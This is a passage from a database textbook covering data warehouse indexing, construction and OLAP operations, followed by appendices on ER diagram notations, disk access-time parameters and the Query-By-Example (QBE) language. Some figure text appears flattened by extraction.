four bit vectors, each containing 100,000 bits (12.5K) for a total index size of 50K. Bitmap indexing can provide considerable input/output and storage space advantages in low-cardinality domains. With bit vectors a bitmap index can provide dramatic improvements in comparison, aggre- gation, and join performance. In a star schema, dimensional data can be indexed to tuples in the fact table by join indexing. Join indexes are traditional indexes to maintain relationships between primary key and foreign key values. They relate the values of a dimension of a star schema to rows in the fact table. For example, consider a sales fact table that has city and fiscal quarter as dimensions. If there is a join index on city, for each city the join index maintains the tuple IDs of tuples containing that city. Join indexes may involve multiple dimensions. Data warehouse storage can facilitate access to summary data by taking further advantage of the nonvolatility of data warehouses and a degree of predictability of the analyses that will be performed using them. Two approaches have been used: (1) smaller tables including summary data such as quarterly sales or revenue by product line, and (2) encoding of level (for example, weekly, quarterly, annual) into existing tables. By comparison, the overhead of creating and maintaining such aggregations would likely be excessive in a volatile, transaction-oriented database. 4 Building a Data Warehouse In constructing a data warehouse, builders should take a broad view of the antici- pated use of the warehouse. There is no way to anticipate all possible queries or analyses during the design phase. However, the design should specifically support ad-hoc querying, that is, accessing data with any meaningful combination of values for the attributes in the dimension or fact tables. For example, a marketing- intensive consumer-products company would require different ways of organizing the data warehouse than would a nonprofit charity focused on fund raising. An appropriate schema should be chosen that reflects anticipated usage. 1042 Overview of Data Warehousing and OLAP Acquisition of data for the warehouse involves the following steps: 1. The data must be extracted from multiple, heterogeneous sources, for exam- ple, databases or other data feeds such as those containing financial market data or environmental data. 2. Data must be formatted for consistency within the warehouse. Names, meanings, and domains of data from unrelated sources must be reconciled. For instance, subsidiary companies of a large corporation may have different fiscal calendars with quarters ending on different dates, making it difficult to aggregate financial data by quarter. Various credit cards may report their transactions differently, making it difficult to compute all credit sales. These format inconsistencies must be resolved. 3. The data must be cleaned to ensure validity. Data cleaning is an involved and complex process that has been identified as the largest labor-demanding component of data warehouse construction. For input data, cleaning must occur before the data is loaded into the warehouse. There is nothing about cleaning data that is specific to data warehousing and that could not be applied to a host database. However, since input data must be examined and formatted consistently, data warehouse builders should take this opportu- nity to check for validity and quality. Recognizing erroneous and incomplete data is difficult to automate, and cleaning that requires automatic error cor- rection can be even tougher. Some aspects, such as domain checking, are eas- ily coded into data cleaning routines, but automatic recognition of other data problems can be more challenging. (For example, one might require that City = ‘San Francisco’ together with State = ‘CT’ be recognized as an incorrect combination.) After such problems have been taken care of, similar data from different sources must be coordinated for loading into the ware- house. As data managers in the organization discover that their data is being cleaned for input into the warehouse, they will likely want to upgrade their data with the cleaned data. The process of returning cleaned data to the source is called backflushing (see Figure 1). 4. The data must be fitted into the data model of the warehouse. Data from the various sources must be installed in the data model of the warehouse. Data may have to be converted from relational, object-oriented, or legacy data- bases (network and/or hierarchical) to a multidimensional model. 5. The data must be loaded into the warehouse. The sheer volume of data in the warehouse makes loading the data a significant task. Monitoring tools for loads as well as methods to recover from incomplete or incorrect loads are required. With the huge volume of data in the warehouse, incremental updating is usually the only feasible approach. The refresh policy will proba- bly emerge as a compromise that takes into account the answers to the fol- lowing questions: ■ How up-to-date must the data be? ■ Can the warehouse go offline, and for how long? ■ What are the data interdependencies? 1043 Overview of Data Warehousing and OLAP ■ What is the storage availability? ■ What are the distribution requirements (such as for replication and parti- tioning)? ■ What is the loading time (including cleaning, formatting, copying, trans- mitting, and overhead such as index rebuilding)? As we have said, databases must strike a balance between efficiency in transaction processing and supporting query requirements (ad hoc user requests), but a data warehouse is typically optimized for access from a decision maker’s needs. Data storage in a data warehouse reflects this specialization and involves the following processes: ■ Storing the data according to the data model of the warehouse ■ Creating and maintaining required data structures ■ Creating and maintaining appropriate access paths ■ Providing for time-variant data as new data are added ■ Supporting the updating of warehouse data ■ Refreshing the data ■ Purging data Although adequate time can be devoted initially to constructing the warehouse, the sheer volume of data in the warehouse generally makes it impossible to simply reload the warehouse in its entirety later on. Alternatives include selective (partial) refreshing of data and separate warehouse versions (requiring double storage capac- ity for the warehouse!). When the warehouse uses an incremental data refreshing mechanism, data may need to be periodically purged; for example, a warehouse that maintains data on the previous twelve business quarters may periodically purge its data each year. Data warehouses must also be designed with full consideration of the environment in which they will reside. Important design considerations include the following: ■ Usage projections ■ The fit of the data model ■ Characteristics of available sources ■ Design of the metadata component ■ Modular component design ■ Design for manageability and change ■ Considerations of distributed and parallel architecture We discuss each of these in turn. Warehouse design is initially driven by usage pro- jections; that is, by expectations about who will use the warehouse and how they will use it. Choice of a data model to support this usage is a key initial decision. Usage projections and the characteristics of the warehouse’s data sources are both taken into account. Modular design is a practical necessity to allow the warehouse to evolve with the organization and its information environment. Additionally, a well- 1044 Overview of Data Warehousing and OLAP built data warehouse must be designed for maintainability, enabling the warehouse managers to plan for and manage change effectively while providing optimal sup- port to users. Recall the term metadata; metadata: the description of a database including its schema definition. The metadata repository is a key data warehouse component. The metadata repository includes both technical and business metadata. The first, technical metadata, covers details of acquisition processing, storage structures, data descriptions, warehouse operations and maintenance, and access support function- ality. The second, business metadata, includes the relevant business rules and orga- nizational details supporting the warehouse. The architecture of the organization’s distributed computing environment is a major determining characteristic for the design of the warehouse. There are two basic distributed architectures: the distributed warehouse and the federated warehouse. For a distributed warehouse, all the issues of distributed databases are relevant, for example, replication, partitioning, communications, and consistency concerns. A distributed architecture can provide benefits particularly important to warehouse performance, such as improved load balancing, scalability of performance, and higher availability. A single replicated metadata repository would reside at each distribution site. The idea of the federated warehouse is like that of the federated database: a decentralized confederation of autonomous data warehouses, each with its own metadata repository. Given the magnitude of the challenge inherent to data warehouses, it is likely that such federations will consist of smaller scale components, such as data marts. Large organizations may choose to federate data marts rather than build huge data warehouses. 5 Typical Functionality of a Data Warehouse Data warehouses exist to facilitate complex, data-intensive, and frequent ad hoc queries. Accordingly, data warehouses must provide far greater and more efficient query support than is demanded of transactional databases. The data warehouse access component supports enhanced spreadsheet functionality, efficient query processing, structured queries, ad hoc queries, data mining, and materialized views. In particular, enhanced spreadsheet functionality includes support for state-of-the- art spreadsheet applications (for example, MS Excel) as well as for OLAP applica- tions programs. These offer preprogrammed functionalities such as the following: ■ Roll-up. Data is summarized with increasing generalization (for example, weekly to quarterly to annually). ■ Drill-down. Increasing levels of detail are revealed (the complement of roll- up). ■ Pivot. Cross tabulation (also referred to as rotation) is performed. ■ Slice and dice. Projection operations are performed on the dimensions. ■ Sorting. Data is sorted by ordinal value. 1045 Overview of Data Warehousing and OLAP ■ Selection. Data is available by value or range. ■ Derived (computed) attributes. Attributes are computed by operations on stored and derived values. Because data warehouses are free from the restrictions of the transactional environ- ment, there is an increased efficiency in query processing. Among the tools and techniques used are query transformation; index intersection and union; special ROLAP (relational OLAP) and MOLAP (multidimensional OLAP) functions; SQL extensions; advanced join methods; and intelligent scanning (as in piggy-backing multiple queries). Improved performance has also been attained with parallel processing. Parallel server architectures include symmetric multiprocessor (SMP), cluster, and mas- sively parallel processing (MPP), and combinations of these. Knowledge workers and decision makers use tools ranging from parametric queries to ad hoc queries to data mining. Thus, the access component of the data warehouse must provide support for structured queries (both parametric and ad hoc). Together, these make up a managed query environment. Data mining itself uses techniques from statistical analysis and artificial intelligence. Statistical analysis can be performed by advanced spreadsheets, by sophisticated statistical analysis soft- ware, or by custom-written programs. Techniques such as lagging, moving averages, and regression analysis are also commonly employed. Artificial intelligence tech- niques, which may include genetic algorithms and neural networks, are used for classification and are employed to discover knowledge from the data warehouse that may be unexpected or difficult to specify in queries. 6 Data Warehouse versus Views Some people have considered data warehouses to be an extension of database views. Materialized views are one way of meeting requirements for improved access to data. Materialized views have been explored for their performance enhancement. Views, however, provide only a subset of the functions and capabilities of data ware- houses. Views and data warehouses are alike in that they both have read-only extracts from databases and subject orientation. However, data warehouses are dif- ferent from views in the following ways: ■ Data warehouses exist as persistent storage instead of being materialized on demand. ■ Data warehouses are not usually relational, but rather multidimensional. Views of a relational database are relational. ■ Data warehouses can be indexed to optimize performance. Views cannot be indexed independent of the underlying databases. ■ Data warehouses characteristically provide specific support of functionality; views cannot. 1046 Overview of Data Warehousing and OLAP ■ Data warehouses provide large amounts of integrated and often temporal data, generally more than is contained in one database, whereas views are an extract of a database. 7 Difficulties of Implementing Data Warehouses Some significant operational issues arise with data warehousing: construction, administration, and quality control. Project management—the design, construc- tion, and implementation of the warehouse—is an important and challenging con- sideration that should not be underestimated. The building of an enterprise-wide warehouse in a large organization is a major undertaking, potentially taking years from conceptualization to implementation. Because of the difficulty and amount of lead time required for such an undertaking, the widespread development and deployment of data marts may provide an attractive alternative, especially to those organizations with urgent needs for OLAP, DSS, and/or data mining support. The administration of a data warehouse is an intensive enterprise, proportional to the size and complexity of the warehouse. An organization that attempts to admin- ister a data warehouse must realistically understand the complex nature of its administration. Although designed for read access, a data warehouse is no more a static structure than any of its information sources. Source databases can be expected to evolve. The warehouse’s schema and acquisition component must be expected to be updated to handle these evolutions. A significant issue in data warehousing is the quality control of data. Both quality and consistency of data are major concerns. Although the data passes through a cleaning function during acquisition, quality and consistency remain significant issues for the database administrator. Melding data from heterogeneous and dis- parate sources is a major challenge given differences in naming, domain definitions, identification numbers, and the like. Every time a source database changes, the data warehouse administrator must consider the possible interactions with other ele- ments of the warehouse. Usage projections should be estimated conservatively prior to construction of the data warehouse and should be revised continually to reflect current requirements. As utilization patterns become clear and change over time, storage and access paths can be tuned to remain optimized for support of the organization’s use of its ware- house. This activity should continue throughout the life of the warehouse in order to remain ahead of demand. The warehouse should also be designed to accommo- date the addition and attrition of data sources without major redesign. Sources and source data will evolve, and the warehouse must accommodate such change. Fitting the available source data into the data model of the warehouse will be a continual challenge, a task that is as much art as science. Because there is continual rapid change in technologies, both the requirements and capabilities of the ware- house will change considerably over time. Additionally, data warehousing technol- ogy itself will continue to evolve for some time so that component structures and 1047 Overview of Data Warehousing and OLAP functionalities will continually be upgraded. This certain change is excellent moti- vation for having fully modular design of components. Administration of a data warehouse will require far broader skills than are needed for traditional database administration. A team of highly skilled technical experts with overlapping areas of expertise will likely be needed, rather than a single indi- vidual. Like database administration, data warehouse administration is only partly technical; a large part of the responsibility requires working effectively with all the members of the organization with an interest in the data warehouse. However diffi- cult that can be at times for database administrators, it is that much more challeng- ing for data warehouse administrators, as the scope of their responsibilities is considerably broader. Design of the management function and selection of the management team for a database warehouse are crucial. Managing the data warehouse in a large organization will surely be a major task. Many commercial tools are available to support manage- ment functions. Effective data warehouse management will certainly be a team func- tion, requiring a wide set of technical skills, careful coordination, and effective leadership. Just as we must prepare for the evolution of the warehouse, we must also recognize that the skills of the management team will, of necessity, evolve with it. 8 Summary In this chapter we surveyed the field known as data warehousing. Data warehousing can be seen as a process that requires a variety of activities to precede it. In contrast, data mining may be thought of as an activity that draws knowledge from an existing data warehouse. We introduced key concepts related to data warehousing and we discussed the special functionality associated with a multidimensional view of data. We also discussed the ways in which data warehouses supply decision makers with information at the correct level of detail, based on an appropriate organization and perspective. Review Questions 1. What is a data warehouse? How does it differ from a database? 2. Define the terms: OLAP (online analytical processing), ROLAP (relational OLAP), MOLAP (multidimensional OLAP), and DSS (decision-support systems). 3. Describe the characteristics of a data warehouse. Divide them into function- ality of a warehouse and advantages users derive from it. 4. What is the multidimensional data model? How is it used in data ware- housing? 5. Define the following terms: star schema, snowflake schema, fact constella- tion, data marts. 1048 Overview of Data Warehousing and OLAP 6. What types of indexes are built for a warehouse? Illustrate the uses for each with an example. 7. Describe the steps of building a warehouse. 8. What considerations play a major role in the design of a warehouse? 9. Describe the functions a user can perform on a data warehouse and illustrate the results of these functions on a sample multidimensional data warehouse. 10. How is the concept of a relational view related to a data warehouse and data marts? In what way are they different? 11. List the difficulties in implementing a data warehouse. 12. List the open issues and research problems in data warehousing. Selected Bibliography Inmon (1992, 2005) is credited for giving the term wide acceptance. Codd and Salley (1993) popularized the term online analytical processing (OLAP) and defined a set of characteristics for data warehouses to support OLAP. Kimball (1996) is known for his contribution to the development of the data warehousing field. Mattison (1996) is one of the several books on data warehousing that gives a comprehensive analysis of techniques available in data warehouses and the strate- gies companies should use in deploying them. Ponniah (2002) gives a very good practical overview of the data warehouse building process from requirements collection to deployment maintenance. Bischoff and Alexander (1997) is a compila- tion of advice from experts. Chaudhuri and Dayal (1997) give an excellent tutorial on the topic, while Widom (1995) points to a number of outstanding research problems. 1049 Alternative Diagrammatic Notations for ER Models Figure 1 shows a number of different diagrammaticnotations for representing ER (Entity-Relationship) and EER (Enhanced ER) model concepts. Unfortunately, there is no standard nota- tion: different database design practitioners prefer different notations. Similarly, var- ious CASE (computer-aided software engineering) tools and OOA (object-oriented analysis) methodologies use various notations. Some notations are associated with models that have additional concepts and constraints beyond those of the ER and EER models described in the chapters “Data Modeling Using the Entity-Relationship (ER) Model,” “The Enhanced Entity-Relationship (EER) Model,” and “Relational Database Design by ER and EER-to-Relational Mapping,” while other models have fewer concepts and constraints. The notation we used in the ER chapter is quite close to the original notation for ER diagrams, which is still widely used. We discuss some alternate notations here. Figure 1(a) shows different notations for displaying entity types/classes, attributes, and relationships. In the above mentioned three chapters, we used the symbols marked (i) in Figure 1(a)—namely, rectangle, oval, and diamond. Notice that sym- bol (ii) for entity types/classes, symbol (ii) for attributes, and symbol (ii) for rela- tionships are similar, but they are used by different methodologies to represent three different concepts. The straight line symbol (iii) for representing relationships is used by several tools and methodologies. Figure 1(b) shows some notations for attaching attributes to entity types. We used notation (i). Notation (ii) uses the third notation (iii) for attributes from Figure 1(a). The last two notations in Figure 1(b)—(iii) and (iv)—are popular in OOA methodologies and in some CASE tools. In particular, the last notation displays both the attributes and the methods of a class, separated by a horizontal line. appendix: From Appendix of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison- Wesley. All rights reserved. 1050 Appendix: Alternative Diagrammatic Notations for ER Models Entity type/class symbols E(i) E(ii) Attribute symbols (i) (ii) Relationship symbols (i) (ii) (iii) (iii) (a) A R A A R R (b) Ssn Name Address . . . EMPLOYEE(ii) EMPLOYEE Ssn(i) Name Address . . . . . . (iii) Ssn Name Address EMPLOYEE . . . . . . (iv) Ssn Name Address Hire_emp Fire_emp EMPLOYEE (c) (i) (ii) 1 N (iii) (iv) (v) (vi) * (d) (i) (ii) 1 N (0,n) (1,1) (0,n)(1,1) (iii) (iv) (e) (i) (iv) C (ii) (iii)C S2S1 S3 d o S2S1 S3 G Gs C S2S1 S3 C S2S1 S3 (v) (vi)C S2S1 S3 C S2S1 S3 G (v) 0..n 1..1 Figure 1 Alternative notations. (a) Symbols for entity type/class, attribute, and relationship. (b) Displaying attrib- utes. (c) Displaying cardinality ratios. (d) Various (min, max) notations. (e) Notations for displaying specialization/generalization. 1051 Appendix: Alternative Diagrammatic Notations for ER Models Figure 1(c) shows various notations for representing the cardinality ratio of binary relationships. We used notation (i) in the three chapters. Notation (ii)—known as the chicken feet notation—is quite popular. Notation (iv) uses the arrow as a func- tional reference (from the N to the 1 side) and resembles our notation for foreign keys in the relational model; notation (v)—used in Bachman diagrams and the net- work data model—uses the arrow in the reverse direction (from the 1 to the N side). For a 1:1 relationship, (ii) uses a straight line without any chicken feet; (iii) makes both halves of the diamond white; and (iv) places arrowheads on both sides. For an M:N relationship, (ii) uses chicken feet at both ends of the line; (iii) makes both halves of the diamond black; and (iv) does not display any arrowheads. Figure 1(d) shows several variations for displaying (min, max) constraints, which are used to display both cardinality ratio and total/partial participation. We mostly used notation (i). Notation (ii) is the alternative notation we used in Figure 15 and discussed in Section 7.4 of the ER chapter. Recall that our notation specifies the constraint that each entity must participate in at least min and at most max rela- tionship instances. Hence, for a 1:1 relationship, both max values are 1; for M:N, both max values are n. A min value greater than 0 (zero) specifies total participation (existence depen-dency). In methodologies that use the straight line for displaying relationships, it is common to reverse the positioning of the (min, max) constraints, as shown in (iii); a variation common in some tools (and in UML notation) is shown in (v). Another popular technique—which follows the same positioning as (iii)—is to display the min as o (“oh” or circle, which stands for zero) or as | (verti- cal dash, which stands for 1), and to display the max as | (vertical dash, which stands for 1) or as chicken feet (which stands for n), as shown in (iv). Figure 1(e) shows some notations for displaying specialization/generalization. We used notation (i) in the EER chapter, where a d in the circle specifies that the sub- classes (S1, S2, and S3) are disjoint and an o in the circle specifies overlapping sub- classes. Notation (ii) uses G (for generalization) to specify disjoint, and Gs to specify overlapping; some notations use the solid arrow, while others use the empty arrow (shown at the side). Notation (iii) uses a triangle pointing toward the superclass, and notation (v) uses a triangle pointing toward the subclasses; it is also possible to use both notations in the same methodology, with (iii) indicating generalization and (v) indicating specialization. Notation (iv) places the boxes representing sub- classes within the box representing the superclass. Of the notations based on (vi), some use a single-lined arrow, and others use a double-lined arrow (shown at the side). The notations shown in Figure 1 show only some of the diagrammatic symbols that have been used or suggested for displaying database conceptual schemes. Other notations, as well as various combinations of the preceding, have also been used. It would be useful to establish a standard that everyone would adhere to, in order to prevent misunderstandings and reduce confusion. 1052 This page intentionally left blank Parameters of Disks The most important disk parameter is the timerequired to locate an arbitrary disk block, given its block address, and then to transfer the block between the disk and a main memory buffer. This is the random access time for accessing a disk block. There are three time components to consider as follows: 1. Seek time (s). This is the time needed to mechanically position the read/write head on the correct track for movable-head disks. (For fixed-head disks, it is the time needed to electronically switch to the appropriate read/write head.) For movable-head disks, this time varies, depending on the distance between the current track under the read/write head and the track specified in the block address. Usually, the disk manufacturer provides an average seek time in milliseconds. The typical range of average seek time is 4 to 10 msec. This is the main culprit for the delay involved in transferring blocks between disk and memory. 2. Rotational delay (rd). Once the read/write head is at the correct track, the user must wait for the beginning of the required block to rotate into position under the read/write head. On average, this takes about the time for half a revolution of the disk, but it actually ranges from immediate access (if the start of the required block is in position under the read/write head right after the seek) to a full disk revolution (if the start of the required block just passed the read/write head after the seek). If the speed of disk rotation is p revolu- tions per minute (rpm), then the average rotational delay rd is given by rd = (1/2) * (1/p) min = (60 * 1000)/(2 * p) msec = 30000/p msec A typical value for p is 10,000 rpm, which gives a rotational delay of rd = 3 msec. For fixed-head disks, where the seek time is negligible, this component causes the greatest delay in transferring a disk block. appendix: From Appendix of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison- Wesley. All rights reserved. 1054 Appendix: Parameters of Disks 3. Block transfer time (btt). Once the read/write head is at the beginning of the required block, some time is needed to transfer the data in the block. This block transfer time depends on the block size, track size, and rotational speed. If the transfer rate for the disk is tr bytes/msec and the block size is B bytes, then btt = B/tr msec If we have a track size of 50 Kbytes and p is 3600 rpm, then the transfer rate in bytes/msec is tr = (50 * 1000)/(60 * 1000/3600) = 3000 bytes/msec In this case, btt = B/3000 msec, where B is the block size in bytes. The average time (s) needed to find and transfer a block, given its block address, is estimated by (s + rd + btt) msec This holds for either reading or writing a block. The principal method of reducing this time is to transfer several blocks that are stored on one or more tracks of the same cylinder; then the seek time is required for the first block only. To transfer con- secutively k noncontiguous blocks that are on the same cylinder, we need approxi- mately s + (k * (rd + btt)) msec In this case, we need two or more buffers in main storage because we are continu- ously reading or writing the k blocks. The transfer time per block is reduced even further when consecutive blocks on the same track or cylinder are transferred. This eliminates the rotational delay for all but the first block, so the estimate for transfer- ring k consecutive blocks is s + rd + (k * btt) msec A more accurate estimate for transferring consecutive blocks takes into account the interblock gap, which includes the information that enables the read/write head to determine which block it is about to read. Usually, the disk manufacturer provides a bulk transfer rate (btr) that takes the gap size into account when reading consecu- tively stored blocks. If the gap size is G bytes, then btr = (B/(B + G)) * tr bytes/msec The bulk transfer rate is the rate of transferring useful bytes in the data blocks. The disk read/write head must go over all bytes on a track as the disk rotates, including the bytes in the interblock gaps, which store control information but not real data. When the bulk transfer rate is used, the time needed to transfer the useful data in one block out of several consecutive blocks is B/btr. Hence, the estimated time to read k blocks consecutively stored on the same cylinder becomes s + rd + (k * (B/btr)) msec 1055 for one disk revolution. If we know that the buffer is ready for rewriting, the system can keep the disk heads on the same track, and during the next disk revolution the updated buffer is rewritten back to the disk block. Hence, the rewrite time Trw, is usually estimated to be the time needed for one disk revolution: Trw = 2 * rd msec = 60000/p msec To summarize, the following is a list of the parameters we have discussed and the symbols we use for them: Seek time: s msec Rotational delay: rd msec Block transfer time: btt msec Rewrite time: Trw msec Transfer rate: tr bytes/msec Bulk transfer rate: btr bytes/msec Block size: B bytes Interblock gap size: G bytes Disk speed: p rpm (revolutions per minute) Another parameter of disks is the rewrite time. This is useful in cases when we read a block from the disk into a main memory buffer, update the buffer, and then write the buffer back to the same disk block on which it was stored. In many cases, the time required to update the buffer in main memory is less than the time required Appendix: Parameters of Disks 1056 This page intentionally left blank Overview of the QBE Language The Query-By-Example (QBE) language is impor-tant because it is one of the first graphical query languages with minimum syntax developed for database systems. It was developed at IBM Research and is available as an IBM commercial product as part of the QMF (Query Management Facility) interface option to DB2. The language was also implemented in the Paradox DBMS, and is related to a point-and-click type inter- face in the Microsoft Access DBMS. It differs from SQL in that the user does not have to explicitly specify a query using a fixed syntax; rather, the query is formulated by filling in templates of relations that are displayed on a monitor screen. Figure 1 shows how these templates may look for the database. The user does not have to remember the names of attributes or relations because they are displayed as part of these templates. Additionally, the user does not have to follow rigid syntax rules for query specification; rather, constants and variables are entered in the columns of the templates to construct an example related to the retrieval or update request. QBE is related to the domain relational calculus, as we shall see, and its original specifica- tion has been shown to be relationally complete. 1 Basic Retrievals in QBE In QBE retrieval queries are specified by filling in one or more rows in the templates of the tables. For a single relation query, we enter either constants or example ele- ments (a QBE term) in the columns of the template of that relation. An example element stands for a domain variable and is specified as an example value preceded by the underscore character (_). Additionally, a P. prefix (called the P dot operator) is entered in certain columns to indicate that we would like to print (or display) appendix: From Appendix of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison- Wesley. All rights reserved. 1058 Appendix: Overview of the QBE Language values in those columns for our result. The constants specify values that must be exactly matched in those columns. For example, consider the query Q0: Retrieve the birth date and address of John B. Smith. In Figures 2(a) through 2(d) we show how this query can be specified in a progressively more terse form in QBE. In Figure 2(a) an example of an employee is presented as the type of row that we are interested in. By leaving John B. Smith as constants in the Fname, Minit, and Lname columns, we are specifying an exact match in those columns. The rest of the columns are preceded by an underscore indicating that they are domain variables (example elements). The P. prefix is placed in the Bdate and Address columns to indicate that we would like to output value(s) in those columns. Q0 can be abbreviated as shown in Figure 2(b). There is no need to specify example values for columns in which we are not interested. Moreover, because example val- ues are completely arbitrary, we can just specify variable names for them, as shown in Figure 2(c). Finally, we can also leave out the example values entirely, as shown in Figure 2(d), and just specify a P. under the columns to be retrieved. To see how retrieval queries in QBE are similar to the domain relational calculus, compare Figure 2(d) with Q0 (simplified) in domain calculus as follows: Q0 : { uv | EMPLOYEE(qrstuvwxyz) and q=‘John’ and r=‘B’ and s=‘Smith’} DEPARTMENT Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno EMPLOYEE DEPT_LOCATIONS Dnumber Dlocation PROJECT Pname Pnumber Plocation Dnum WORKS_ON Essn Pno Hours DEPENDENT Essn Dependent_name Sex Bdate Relationship Dname Dnumber Mgr_ssn Mgr_start_date Figure 1 The relational schema of Figure 5 in the chapter “The Relational Data Model and Relational Database Constraints” as it may be displayed by QBE. 1059 We can think of each column in a QBE template as an implicit domain variable; hence, Fname corresponds to the domain variable q, Minit corresponds to r, ..., and Dno corresponds to z. In the QBE query, the columns with P. correspond to variables specified to the left of the bar in domain calculus, whereas the columns with con- stant values correspond to tuple variables with equality selection conditions on them. The condition EMPLOYEE(qrstuvwxyz) and the existential quantifiers are implicit in the QBE query because the template corresponding to the EMPLOYEE relation is used. In QBE, the user interface first allows the user to choose the tables (relations) needed to formulate a query by displaying a list of all relation names. Then the tem- plates for the chosen relations are displayed. The user moves to the appropriate columns in the templates and specifies the query. Special function keys are provided to move among templates and perform certain functions. We now give examples to illustrate basic facilities of QBE. Comparison operators other than = (such as > or ≥) may be entered in a column before typing a constant
value. For example, the query Q0A: List the social security numbers of employees who
work more than 20 hours per week on project number 1 can be specified as shown in
Figure 3(a). For more complex conditions, the user can ask for a condition box,
which is created by pressing a particular function key. The user can then type the
complex condition.1

Appendix: Overview of the QBE Language

EMPLOYEE(a)

(b)

(c)

(d)

Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno

John B Smith _123456789 P._9/1/60 P._100 Main, Houston, TX _M _25000 _123456789 _3

EMPLOYEE

Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno

John B Smith P._9/1/60 P._100 Main, Houston, TX

EMPLOYEE

Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno

John B Smith P._X P._Y

EMPLOYEE

Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno

John B Smith P. P.

Figure 2
Four ways to specify the query Q0 in QBE.

1Negation with the ¬ symbol is not allowed in a condition box.

1060

Appendix: Overview of the QBE Language

For example, the query Q0B: List the social security numbers of employees who work
more than 20 hours per week on either project 1 or project 2 can be specified as shown
in Figure 3(b).

Some complex conditions can be specified without a condition box. The rule is that
all conditions specified on the same row of a relation template are connected by the
and logical connective (all must be satisfied by a selected tuple), whereas conditions
specified on distinct rows are connected by or (at least one must be satisfied).
Hence, Q0B can also be specified, as shown in Figure 3(c), by entering two distinct
rows in the template.

Now consider query Q0C: List the social security numbers of employees who work on
both project 1 and project 2; this cannot be specified as in Figure 4(a), which lists
those who work on either project 1 or project 2. The example variable _ES will bind
itself to Essn values in <–, 1, –> tuples as well as to those in <–, 2, –> tuples. Figure
4(b) shows how to specify Q0C correctly, where the condition (_EX = _EY) in the
box makes the _EX and _EY variables bind only to identical Essn values.

In general, once a query is specified, the resulting values are displayed in the template
under the appropriate columns. If the result contains more rows than can be dis-
played on the screen, most QBE implementations have function keys to allow scroll-
ing up and down the rows. Similarly, if a template or several templates are too wide to
appear on the screen, it is possible to scroll sideways to examine all the templates.

A join operation is specified in QBE by using the same variable2 in the columns to
be joined. For example, the query Q1: List the name and address of all employees who

2A variable is called an example element in QBE manuals.

WORKS_ON

(a) Essn Pno Hours

P. > 20

WORKS_ON

(b) Essn Pno Hours

P. _PX _HX

_HX > 20 and (PX = 1 or PX = 2)

CONDITIONS

WORKS_ON

(c) Essn Pno Hours

P. > 201
P. > 202

Figure 3
Specifying complex conditions
in QBE. (a) The query Q0A.
(b) The query Q0B with a
condition box. (c) The query
Q0B without a condition box.

1061

Appendix: Overview of the QBE Language

work for the ‘Research’ department can be specified as shown in Figure 5(a). Any
number of joins can be specified in a single query. We can also specify a result table
to display the result of the join query, as shown in Figure 5(a); this is needed if the
result includes attributes from two or more relations. If no result table is specified,
the system provides the query result in the columns of the various relations, which
may make it difficult to interpret. Figure 5(a) also illustrates the feature of QBE for
specifying that all attributes of a relation should be retrieved, by placing the P. oper-
ator under the relation name in the relation template.

To join a table with itself, we specify different variables to represent the different ref-
erences to the table. For example, query Q8: For each employee retrieve the employee’s
first and last name as well as the first and last name of his or her immediate supervisor
can be specified as shown in Figure 5(b), where the variables starting with E refer to
an employee and those starting with S refer to a supervisor.

2 Grouping, Aggregation, and Database
Modification in QBE

Next, consider the types of queries that require grouping or aggregate functions. A
grouping operator G. can be specified in a column to indicate that tuples should be
grouped by the value of that column. Common functions can be specified, such as
AVG., SUM., CNT. (count), MAX., and MIN. In QBE the functions AVG., SUM., and
CNT. are applied to distinct values within a group in the default case. If we want
these functions to apply to all values, we must use the prefix ALL.3 This convention
is different in SQL, where the default is to apply a function to all values.

WORKS_ON
(a) Essn Pno Hours

P._ES 1
P._ES 2

WORKS_ON
(b) Essn Pno Hours

P._EX 1
P._EY 2

_EX = _EY

CONDITIONS

Figure 4
Specifying EMPLOYEES who work
on both projects. (a) Incorrect
specification of an AND condition.
(b) Correct specification.

3ALL in QBE is unrelated to the universal quantifier.

1062

Appendix: Overview of the QBE Language

Figure 6(a) shows query Q23, which counts the number of distinct salary values in
the EMPLOYEE relation. Query Q23A (Figure 6(b) counts all salary values, which is
the same as counting the number of employees. Figure 6(c) shows Q24, which
retrieves each department number and the number of employees and average salary
within each department; hence, the Dno column is used for grouping as indicated by
the G. function. Several of the operators G., P., and ALL can be specified in a single
column. Figure 6(d) shows query Q26, which displays each project name and the
number of employees working on it for projects on which more than two employees
work.

QBE has a negation symbol, ¬, which is used in a manner similar to the NOT EXISTS
function in SQL. Figure 7 shows query Q6, which lists the names of employees who
have no dependents. The negation symbol ¬ says that we will select values of the
_SX variable from the EMPLOYEE relation only if they do not occur in the
DEPENDENT relation. The same effect can be produced by placing a ¬ _SX in the
Essn column.

Although the QBE language as originally proposed was shown to support
the equivalent of the EXISTS and NOT EXISTS functions of SQL, the QBE imple-
mentation in QMF (under the DB2 system) does not provide this support. Hence,
the QMF version of QBE, which we discuss here, is not relationally complete.
Queries such as Q3: Find employees who work on all projects controlled by depart-
ment 5 cannot be specified.

EMPLOYEE(a)

(b)

Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno
_FN

Research

P. _FN _LN _Addr

_DX

_LN _Addr _DX

DEPARTMENT

Dname Dnumber Mgrssn Mgr_start_date

RESULT

P. _E1 _E2 _S1

RESULT
_S2

EMPLOYEE

Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno
_E1 _E2 _Xssn

_S1 _S2 _Xssn

Figure 5
Illustrating JOIN and result relations in QBE. (a) The query Q1. (b) The query Q8.

1063

Appendix: Overview of the QBE Language

There are three QBE operators for modifying the database: I. for insert, D. for delete,
and U. for update. The insert and delete operators are specified in the template col-
umn under the relation name, whereas the update operator is specified under the
columns to be updated. Figure 8(a) shows how to insert a new EMPLOYEE tuple. For
deletion, we first enter the D. operator and then specify the tuples to be deleted by a
condition (Figure 8(b)). To update a tuple, we specify the U. operator under the
attribute name, followed by the new value of the attribute. We should also select the
